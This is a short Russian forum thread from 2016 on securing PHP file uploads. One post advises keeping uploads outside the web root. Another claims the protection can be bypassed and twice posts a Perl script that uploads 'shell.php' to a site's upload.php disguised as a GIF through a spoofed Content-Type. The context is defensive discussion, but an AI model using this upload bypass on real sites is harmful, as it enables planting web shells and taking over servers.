(28 фев 2016, 14:29) (0/0)
[0]
khujand,
Я считаю, что оптимальный вариант это хранение файлов за корневой директорией и не давать пользователю знать оригинальное название файла. Так же при наличие финансовой возможности размещать файлы на сторонних серверах, как это делает множество крупных компаний.
(28 фев 2016, 12:08) (0/0)
[0]
Не вижу смысла в этой защите. Её можно обойти.
<?
#!/usr/bin/perl
#
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'http://site.ru/upload.php',
Content_Type => 'form-data',
Content => [userfile => ["shell.php", "shell.php", "Content-Type" =>"image/gif"],],);
print $res->as_string();
?>
<?
#!/usr/bin/perl
#
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'http://site.ru/upload.php',
Content_Type => 'form-data',
Content => [userfile => ["shell.php", "shell.php", "Content-Type" =>"image/gif"],],);
print $res->as_string();
?>
- 1 из 1
